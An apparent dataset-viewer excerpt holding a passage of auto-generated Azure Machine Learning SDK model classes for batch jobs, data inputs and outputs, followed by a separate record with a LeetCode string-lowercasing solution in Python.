        :keyword mini_batch_size: Size of the mini-batch passed to each batch invocation.
         For FileDataset, this is the number of files per mini-batch.
         For TabularDataset, this is the size of the records in bytes, per mini-batch.
        :paramtype mini_batch_size: long
        :keyword name:
        :paramtype name: str
        :keyword output_data: Job output data location
         Optional parameter: when not specified, the default location is
         workspaceblobstore location.
        :paramtype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
        :keyword output_dataset: Output dataset location
         Optional parameter: when not specified, the default location is
         workspaceblobstore location.
         This will be deprecated. Use OutputData instead.
        :paramtype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
        :keyword output_file_name: Output file name.
        :paramtype output_file_name: str
        :keyword partition_keys: Partition keys list used for Named partitioning.
        :paramtype partition_keys: list[str]
        :keyword properties: The asset property dictionary.
        :paramtype properties: dict[str, str]
        :keyword retry_settings: Retry Settings for the batch inference operation.
        :paramtype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
        :keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
        :paramtype tags: dict[str, str]
        """
        super(BatchJob, self).__init__(**kwargs)
        self.compute = kwargs.get('compute', None)
        self.dataset = kwargs.get('dataset', None)
        self.description = kwargs.get('description', None)
        self.error_threshold = kwargs.get('error_threshold', None)
        self.input_data = kwargs.get('input_data', None)
        # Server-populated; initialized to None on the client side.
        self.interaction_endpoints = None
        self.logging_level = kwargs.get('logging_level', None)
        self.max_concurrency_per_instance = kwargs.get('max_concurrency_per_instance', None)
        self.mini_batch_size = kwargs.get('mini_batch_size', None)
        self.name = kwargs.get('name', None)
        self.output = None
        self.output_data = kwargs.get('output_data', None)
        self.output_dataset = kwargs.get('output_dataset', None)
        self.output_file_name = kwargs.get('output_file_name', None)
        self.partition_keys = kwargs.get('partition_keys', None)
        self.properties = kwargs.get('properties', None)
        self.provisioning_state = None
        self.retry_settings = kwargs.get('retry_settings', None)
        self.status = None
        self.tags = kwargs.get('tags', None)
class Resource(msrest.serialization.Model):
    """Common fields returned for every Azure Resource Manager resource.

    All fields are populated by the server and ignored when sending a request.

    :ivar id: Fully qualified resource ID for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
     "Microsoft.Storage/storageAccounts".
    :vartype type: str
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
    }

    def __init__(self, **kwargs):
        """All fields are read-only; nothing is taken from ``kwargs``."""
        super(Resource, self).__init__(**kwargs)
        # Read-only fields are filled in by the service on deserialization.
        self.id = None
        self.name = None
        self.type = None
class BatchJobResource(Resource):
    """Azure Resource Manager resource envelope for a BatchJob.

    Read-only fields are populated by the server and ignored on requests;
    ``properties`` is required when sending to Azure.

    :ivar id: Fully qualified resource ID for the resource (read-only).
    :vartype id: str
    :ivar name: The name of the resource (read-only).
    :vartype name: str
    :ivar type: The type of the resource (read-only).
    :vartype type: str
    :ivar properties: Required. Additional attributes of the entity.
    :vartype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
    :ivar system_data: System data associated with resource provider (read-only).
    :vartype system_data: ~azure.mgmt.machinelearningservices.models.SystemData
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "properties": {"required": True},
        "system_data": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "properties": {"key": "properties", "type": "BatchJob"},
        "system_data": {"key": "systemData", "type": "SystemData"},
    }

    def __init__(self, **kwargs):
        """
        :keyword properties: Required. Additional attributes of the entity.
        :paramtype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
        """
        super(BatchJobResource, self).__init__(**kwargs)
        self.properties = kwargs["properties"]  # required: KeyError when absent
        self.system_data = None  # server-populated
class BatchJobResourceArmPaginatedResult(msrest.serialization.Model):
    """A paginated list of BatchJob entities.

    :ivar next_link: The link to the next page of BatchJob objects; ``None`` when
     there are no additional pages.
    :vartype next_link: str
    :ivar value: An array of objects of type BatchJob.
    :vartype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
    """

    _attribute_map = {
        "next_link": {"key": "nextLink", "type": "str"},
        "value": {"key": "value", "type": "[BatchJobResource]"},
    }

    def __init__(self, **kwargs):
        """Accepts optional ``next_link`` and ``value`` keyword arguments."""
        super(BatchJobResourceArmPaginatedResult, self).__init__(**kwargs)
        self.next_link = kwargs.get("next_link")
        self.value = kwargs.get("value")
class BatchRetrySettings(msrest.serialization.Model):
    """Retry settings for a batch inference operation.

    :ivar max_retries: Maximum retry count for a mini-batch.
    :vartype max_retries: int
    :ivar timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
    :vartype timeout: ~datetime.timedelta
    """

    _attribute_map = {
        "max_retries": {"key": "maxRetries", "type": "int"},
        "timeout": {"key": "timeout", "type": "duration"},
    }

    def __init__(self, **kwargs):
        """Accepts optional ``max_retries`` and ``timeout`` keyword arguments."""
        super(BatchRetrySettings, self).__init__(**kwargs)
        self.max_retries = kwargs.get("max_retries")
        self.timeout = kwargs.get("timeout")
class ComputeConfiguration(msrest.serialization.Model):
    """Configuration for compute binding.

    :ivar instance_count: Number of instances or nodes.
    :vartype instance_count: int
    :ivar instance_type: SKU type to run on.
    :vartype instance_type: str
    :ivar is_local: Set to true for jobs running on local compute.
    :vartype is_local: bool
    :ivar location: Location for virtual cluster run.
    :vartype location: str
    :ivar properties: Additional properties.
    :vartype properties: dict[str, str]
    :ivar target: ARM resource ID of the Compute being targeted; when omitted the
     resource is deployed as Managed.
    :vartype target: str
    """

    _attribute_map = {
        "instance_count": {"key": "instanceCount", "type": "int"},
        "instance_type": {"key": "instanceType", "type": "str"},
        "is_local": {"key": "isLocal", "type": "bool"},
        "location": {"key": "location", "type": "str"},
        "properties": {"key": "properties", "type": "{str}"},
        "target": {"key": "target", "type": "str"},
    }

    def __init__(self, **kwargs):
        """Accepts the class's documented attributes as keyword arguments."""
        super(ComputeConfiguration, self).__init__(**kwargs)
        self.instance_count = kwargs.get("instance_count")
        self.instance_type = kwargs.get("instance_type")
        self.is_local = kwargs.get("is_local")
        self.location = kwargs.get("location")
        self.properties = kwargs.get("properties")
        self.target = kwargs.get("target")
class DataVersion(msrest.serialization.Model):
    """Data asset version details.

    ``path`` is required when sending to Azure.

    :ivar dataset_type: The format of the dataset. Possible values include: "Simple", "Dataflow".
    :vartype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
    :ivar datastore_id: ARM resource ID of the datastore where the asset is located.
    :vartype datastore_id: str
    :ivar description: The asset description text.
    :vartype description: str
    :ivar is_anonymous: Whether the name/version were system generated (anonymous registration).
    :vartype is_anonymous: bool
    :ivar path: Required. The path of the file/directory in the datastore.
    :vartype path: str
    :ivar properties: The asset property dictionary.
    :vartype properties: dict[str, str]
    :ivar tags: Tag dictionary. Tags can be added, removed, and updated.
    :vartype tags: dict[str, str]
    """

    _validation = {
        "path": {"required": True, "pattern": r"[a-zA-Z0-9_]"},
    }

    _attribute_map = {
        "dataset_type": {"key": "datasetType", "type": "str"},
        "datastore_id": {"key": "datastoreId", "type": "str"},
        "description": {"key": "description", "type": "str"},
        "is_anonymous": {"key": "isAnonymous", "type": "bool"},
        "path": {"key": "path", "type": "str"},
        "properties": {"key": "properties", "type": "{str}"},
        "tags": {"key": "tags", "type": "{str}"},
    }

    def __init__(self, **kwargs):
        """Accepts the class's documented attributes as keyword arguments;
        ``path`` is mandatory (``KeyError`` when missing).
        """
        super(DataVersion, self).__init__(**kwargs)
        self.dataset_type = kwargs.get("dataset_type")
        self.datastore_id = kwargs.get("datastore_id")
        self.description = kwargs.get("description")
        self.is_anonymous = kwargs.get("is_anonymous")
        self.path = kwargs["path"]
        self.properties = kwargs.get("properties")
        self.tags = kwargs.get("tags")
class ErrorDetail(msrest.serialization.Model):
    """Error detail information.

    Both fields are required when sending to Azure.

    :ivar code: Required. Error code.
    :vartype code: str
    :ivar message: Required. Error message.
    :vartype message: str
    """

    _validation = {
        "code": {"required": True},
        "message": {"required": True},
    }

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
    }

    def __init__(self, **kwargs):
        """Requires ``code`` and ``message`` keyword arguments."""
        super(ErrorDetail, self).__init__(**kwargs)
        self.code = kwargs["code"]
        self.message = kwargs["message"]
class ErrorResponse(msrest.serialization.Model):
    """Error response information.

    All fields are populated by the server and ignored when sending a request.

    :ivar code: Error code.
    :vartype code: str
    :ivar message: Error message.
    :vartype message: str
    :ivar details: An array of error detail objects.
    :vartype details: list[~azure.mgmt.machinelearningservices.models.ErrorDetail]
    """

    _validation = {
        "code": {"readonly": True},
        "message": {"readonly": True},
        "details": {"readonly": True},
    }

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
        "details": {"key": "details", "type": "[ErrorDetail]"},
    }

    def __init__(self, **kwargs):
        """All fields are read-only; nothing is taken from ``kwargs``."""
        super(ErrorResponse, self).__init__(**kwargs)
        self.code = None
        self.message = None
        self.details = None
class InferenceDataInputBase(msrest.serialization.Model):
    """Polymorphic base for inference data inputs.

    Use the sub-classes rather than this class directly. Known sub-classes:
    InferenceDataUrlInput, InferenceDatasetIdInput, InferenceDatasetInput.

    :ivar data_input_type: Required. Discriminator, constant filled by server. Possible values
     include: "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    """

    _validation = {
        "data_input_type": {"required": True},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
    }

    _subtype_map = {
        "data_input_type": {
            "DataUrl": "InferenceDataUrlInput",
            "DatasetId": "InferenceDatasetIdInput",
            "DatasetVersion": "InferenceDatasetInput",
        }
    }

    def __init__(self, **kwargs):
        """The discriminator is filled in by the concrete sub-class."""
        super(InferenceDataInputBase, self).__init__(**kwargs)
        self.data_input_type = None  # type: Optional[str]
class InferenceDatasetIdInput(InferenceDataInputBase):
    """Inference data input referenced by dataset ARM ID.

    :ivar data_input_type: Required. Discriminator, constant filled by server. Possible values
     include: "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    :ivar dataset_id: ARM ID of the input dataset.
    :vartype dataset_id: str
    """

    _validation = {
        "data_input_type": {"required": True},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
        "dataset_id": {"key": "datasetId", "type": "str"},
    }

    def __init__(self, **kwargs):
        """Accepts an optional ``dataset_id`` keyword argument."""
        super(InferenceDatasetIdInput, self).__init__(**kwargs)
        self.data_input_type = "DatasetId"  # type: str
        self.dataset_id = kwargs.get("dataset_id")
class InferenceDatasetInput(InferenceDataInputBase):
    """Inference data input referenced by dataset name and version.

    :ivar data_input_type: Required. Discriminator, constant filled by server. Possible values
     include: "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    :ivar dataset_name: Name of the input dataset.
    :vartype dataset_name: str
    :ivar dataset_version: Version of the input dataset.
    :vartype dataset_version: str
    """

    _validation = {
        "data_input_type": {"required": True},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
        "dataset_name": {"key": "datasetName", "type": "str"},
        "dataset_version": {"key": "datasetVersion", "type": "str"},
    }

    def __init__(self, **kwargs):
        """Accepts optional ``dataset_name`` and ``dataset_version`` keyword arguments."""
        super(InferenceDatasetInput, self).__init__(**kwargs)
        self.data_input_type = "DatasetVersion"  # type: str
        self.dataset_name = kwargs.get("dataset_name")
        self.dataset_version = kwargs.get("dataset_version")
class InferenceDataUrlInput(InferenceDataInputBase):
    """Inference data input referenced by URL.

    ``path`` is required when sending to Azure.

    :ivar data_input_type: Required. Discriminator, constant filled by server. Possible values
     include: "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    :ivar path: Required. Asset path to the input data, say a blob URL.
    :vartype path: str
    """

    _validation = {
        "data_input_type": {"required": True},
        "path": {"required": True, "pattern": r"[a-zA-Z0-9_]"},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
        "path": {"key": "path", "type": "str"},
    }

    def __init__(self, **kwargs):
        """Requires a ``path`` keyword argument."""
        super(InferenceDataUrlInput, self).__init__(**kwargs)
        self.data_input_type = "DataUrl"  # type: str
        self.path = kwargs["path"]
class JobEndpoint(msrest.serialization.Model):
    """Job endpoint definition.

    :ivar endpoint: Url for endpoint.
    :vartype endpoint: str
    :ivar job_endpoint_type: Endpoint type.
    :vartype job_endpoint_type: str
    :ivar port: Port for endpoint.
    :vartype port: int
    :ivar properties: Additional properties to set on the endpoint.
    :vartype properties: dict[str, str]
    """

    _attribute_map = {
        "endpoint": {"key": "endpoint", "type": "str"},
        "job_endpoint_type": {"key": "jobEndpointType", "type": "str"},
        "port": {"key": "port", "type": "int"},
        "properties": {"key": "properties", "type": "{str}"},
    }

    def __init__(self, **kwargs):
        """Accepts the class's documented attributes as keyword arguments."""
        super(JobEndpoint, self).__init__(**kwargs)
        self.endpoint = kwargs.get("endpoint")
        self.job_endpoint_type = kwargs.get("job_endpoint_type")
        self.port = kwargs.get("port")
        self.properties = kwargs.get("properties")
class JobInput(msrest.serialization.Model):
    """Polymorphic base for job input definitions.

    Use the sub-classes rather than this class directly. Known sub-classes:
    MLTableJobInput, UriFileJobInput, UriFolderJobInput.

    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Discriminator, constant filled by server. Possible values
     include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

    _validation = {
        "job_input_type": {"required": True},
    }

    _attribute_map = {
        "description": {"key": "description", "type": "str"},
        "job_input_type": {"key": "jobInputType", "type": "str"},
    }

    _subtype_map = {
        "job_input_type": {
            "MLTable": "MLTableJobInput",
            "UriFile": "UriFileJobInput",
            "UriFolder": "UriFolderJobInput",
        }
    }

    def __init__(self, **kwargs):
        """Accepts an optional ``description``; the discriminator is set by sub-classes."""
        super(JobInput, self).__init__(**kwargs)
        self.description = kwargs.get("description")
        self.job_input_type = None  # type: Optional[str]
class JobOutputArtifacts(msrest.serialization.Model):
    """Location of a job's logs and artifacts.

    Both fields are populated by the server and ignored when sending a request.

    :ivar datastore_id: ARM ID of the datastore where the job logs and artifacts are stored.
    :vartype datastore_id: str
    :ivar path: Path within the datastore to the job logs and artifacts.
    :vartype path: str
    """

    _validation = {
        "datastore_id": {"readonly": True},
        "path": {"readonly": True},
    }

    _attribute_map = {
        "datastore_id": {"key": "datastoreId", "type": "str"},
        "path": {"key": "path", "type": "str"},
    }

    def __init__(self, **kwargs):
        """All fields are read-only; nothing is taken from ``kwargs``."""
        super(JobOutputArtifacts, self).__init__(**kwargs)
        self.datastore_id = None
        self.path = None
class JobOutputV2(msrest.serialization.Model):
    """Polymorphic base describing where to find a job output.

    Use the sub-classes rather than this class directly. Known sub-classes:
    UriFileJobOutput.

    :ivar description: Description for the output.
    :vartype description: str
    :ivar job_output_type: Required. Discriminator, constant filled by server. Possible values
     include: "UriFile".
    :vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
    """

    _validation = {
        "job_output_type": {"required": True},
    }

    _attribute_map = {
        "description": {"key": "description", "type": "str"},
        "job_output_type": {"key": "jobOutputType", "type": "str"},
    }

    _subtype_map = {
        "job_output_type": {"UriFile": "UriFileJobOutput"}
    }

    def __init__(self, **kwargs):
        """Accepts an optional ``description``; the discriminator is set by sub-classes."""
        super(JobOutputV2, self).__init__(**kwargs)
        self.description = kwargs.get("description")
        self.job_output_type = None  # type: Optional[str]
class LabelClass(msrest.serialization.Model):
    """Label class definition.

    :ivar display_name: Display name of the label class.
    :vartype display_name: str
    :ivar subclasses: Dictionary of subclasses of the label class.
    :vartype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
    """

    _attribute_map = {
        "display_name": {"key": "displayName", "type": "str"},
        "subclasses": {"key": "subclasses", "type": "{LabelClass}"},
    }

    def __init__(self, **kwargs):
        """Accepts optional ``display_name`` and ``subclasses`` keyword arguments."""
        super(LabelClass, self).__init__(**kwargs)
        self.display_name = kwargs.get("display_name")
        self.subclasses = kwargs.get("subclasses")
class MLTableJobInput(JobInput, AssetJobInput):
    """An MLTable-typed job input.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
        'job_input_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_input_type': {'key': 'jobInputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super(MLTableJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs['uri']  # required: raises KeyError when missing
        self.description = kwargs.get('description', None)
        # Discriminator constant; the generated code assigned it twice — once is enough.
        self.job_input_type = 'MLTable'  # type: str
class SystemData(msrest.serialization.Model):
    """Metadata pertaining to creation and last modification of the resource.

    :ivar created_by: The identity that created the resource.
    :vartype created_by: str
    :ivar created_by_type: The type of identity that created the resource. Possible values
     include: "User", "Application", "ManagedIdentity", "Key".
    :vartype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
    :ivar created_at: The timestamp of resource creation (UTC).
    :vartype created_at: ~datetime.datetime
    :ivar last_modified_by: The identity that last modified the resource.
    :vartype last_modified_by: str
    :ivar last_modified_by_type: The type of identity that last modified the resource. Possible
     values include: "User", "Application", "ManagedIdentity", "Key".
    :vartype last_modified_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
    :ivar last_modified_at: The timestamp of resource last modification (UTC).
    :vartype last_modified_at: ~datetime.datetime
    """

    _attribute_map = {
        "created_by": {"key": "createdBy", "type": "str"},
        "created_by_type": {"key": "createdByType", "type": "str"},
        "created_at": {"key": "createdAt", "type": "iso-8601"},
        "last_modified_by": {"key": "lastModifiedBy", "type": "str"},
        "last_modified_by_type": {"key": "lastModifiedByType", "type": "str"},
        "last_modified_at": {"key": "lastModifiedAt", "type": "iso-8601"},
    }

    def __init__(self, **kwargs):
        """Accepts the class's documented attributes as keyword arguments."""
        super(SystemData, self).__init__(**kwargs)
        self.created_by = kwargs.get("created_by")
        self.created_by_type = kwargs.get("created_by_type")
        self.created_at = kwargs.get("created_at")
        self.last_modified_by = kwargs.get("last_modified_by")
        self.last_modified_by_type = kwargs.get("last_modified_by_type")
        self.last_modified_at = kwargs.get("last_modified_at")
class UriFileJobInput(JobInput, AssetJobInput):
    """A URI-file-typed job input.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
        'job_input_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_input_type': {'key': 'jobInputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super(UriFileJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs['uri']  # required: raises KeyError when missing
        self.description = kwargs.get('description', None)
        # Discriminator constant; the generated code assigned it twice — once is enough.
        self.job_input_type = 'UriFile'  # type: str
class UriFileJobOutput(JobOutputV2, AssetJobOutput):
    """A URI-file-typed job output.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
    :ivar uri: Output Asset URI. This will have a default value of
     "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
    :vartype uri: str
    :ivar description: Description for the output.
    :vartype description: str
    :ivar job_output_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile".
    :vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
    """

    _validation = {
        'job_output_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_output_type': {'key': 'jobOutputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount",
         "Upload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
        :keyword uri: Output Asset URI. This will have a default value of
         "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
        :paramtype uri: str
        :keyword description: Description for the output.
        :paramtype description: str
        """
        super(UriFileJobOutput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs.get('uri', None)
        self.description = kwargs.get('description', None)
        # Discriminator constant; the generated code assigned it twice — once is enough.
        self.job_output_type = 'UriFile'  # type: str
class UriFolderJobInput(JobInput, AssetJobInput):
    """A URI-folder-typed job input.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
        'job_input_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_input_type': {'key': 'jobInputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super(UriFolderJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs['uri']  # required: raises KeyError when missing
        self.description = kwargs.get('description', None)
        # Discriminator constant; the generated code assigned it twice — once is enough.
        self.job_input_type = 'UriFolder'  # type: str
| StarcoderdataPython |
6494807 | <gh_stars>1-10
"""
https://leetcode.com/problems/to-lower-case/
Implement function ToLowerCase() that has a string parameter str, and returns the same string in lowercase.
Example 1:
Input: "Hello"
Output: "hello"
Example 2:
Input: "here"
Output: "here"
Example 3:
Input: "LOVELY"
Output: "lovely"
"""
# time complexity: O(n), space complexity: O(1)
class Solution:
    def toLowerCase(self, str: str) -> str:
        """Return *str* with ASCII uppercase letters ('A'-'Z') lowercased.

        Only ASCII letters are shifted (by the fixed code-point gap between
        'A' and 'a'); every other character passes through unchanged — same
        behavior as the original per-character loop, but built with
        ``str.join`` to avoid the quadratic ``+=`` string accumulation.
        """
        # NOTE: the parameter is named `str` (shadowing the builtin) to keep
        # the LeetCode-provided signature intact for callers.
        offset = ord('a') - ord('A')
        return ''.join(
            chr(ord(c) + offset) if 'A' <= c <= 'Z' else c for c in str
        )
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.